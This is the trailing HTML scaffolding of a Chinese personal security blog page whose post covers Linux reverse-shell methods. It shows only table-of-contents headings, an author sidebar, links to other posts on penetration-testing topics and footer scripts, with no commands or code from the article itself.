shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#perl%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.3.</span> <span class="toc-text"> perl 脚本反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ruby%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.4.</span> <span class="toc-text"> Ruby 脚本反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8metasploit%E7%94%9F%E6%88%90%E5%8F%8D%E5%BC%B9shell%E4%B8%80%E5%8F%A5%E8%AF%9D"><span class="toc-number">2.5.</span> <span class="toc-text"> 利用 metasploit 生成反弹 shell 一句话</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8openssl%E5%8F%8D%E5%BC%B9%E5%8A%A0%E5%AF%86shell"><span class="toc-number">2.6.</span> <span class="toc-text"> 利用 OpenSSL 反弹加密 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A9%E5%B1%95%E5%8F%8D%E5%BC%B9shell%E5%90%8E%E8%8E%B7%E5%8F%96%E7%BB%88%E7%AB%AF"><span class="toc-number">2.7.</span> <span class="toc-text"> 扩展反弹 shell 后获取终端</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="chun"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">chun</p>
  <div class="description" itemprop="description">欢迎来到我的博客(*^﹏^*),本人为新人,你可以阅读我的学习笔记并提出独到的见解~我们将互相学习,共同进步,望大佬们勿喷</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">16</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">16</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lvdXJuYW1l" title="https:&#x2F;&#x2F;github.com&#x2F;yourname"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;twitter.com&#x2F;yourname"><i class="ic i-twitter"></i></span>
      <span class="exturl item zhihu" data-url="aHR0cHM6Ly93d3cuemhpaHUuY29tL3Blb3BsZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;yourname"><i class="ic i-zhihu"></i></span>
      <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPXlvdXJpZA==" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;yourid"><i class="ic i-cloud-music"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly93ZWliby5jb20veW91cm5hbWU=" title="https:&#x2F;&#x2F;weibo.com&#x2F;yourname"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly9hYm91dC5tZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;about.me&#x2F;yourname"><i class="ic i-address-card"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/link/" rel="section"><i class="ic i-link"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/05/05/%E6%BA%AF%E6%BA%90%E5%8F%96%E8%AF%81%E6%80%BB%E7%BB%93/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2021/07/18/Linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/16/Windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/" title="Windows内核提权">Windows内核提权</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/08/19/impacket%E8%84%9A%E6%9C%AC%E5%88%A9%E7%94%A8/" title="impacket脚本利用">impacket脚本利用</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/11/19/%E5%B8%B8%E7%94%A8%E7%AB%AF%E5%8F%A3%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" title="常用端口漏洞利用">常用端口漏洞利用</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/04/php%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0/" title="php危险函数">php危险函数</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/08/18/Coablt%20strike%E6%80%BB%E7%BB%93/" title="Coablt strike总结">Coablt strike总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/08/19/Gear_Of_War%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/" title="Gear_Of_War靶场笔记">Gear_Of_War靶场笔记</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/02/paramiko%E6%A8%A1%E5%9D%97%E4%BB%8B%E7%BB%8D/" title="paramiko模块介绍">paramiko模块介绍</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/05/%E6%BA%AF%E6%BA%90%E5%8F%96%E8%AF%81%E6%80%BB%E7%BB%93/" title="溯源取证总结">溯源取证总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/21/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93/" title="meterpreter学习笔记">meterpreter学习笔记</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/08/20/Chanakya%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/" title="Chanakya靶场笔记">Chanakya靶场笔记</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2021</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">chun @ Go Forward</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">93k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">1:24</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/05/14/Linux反弹shell多种姿态/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
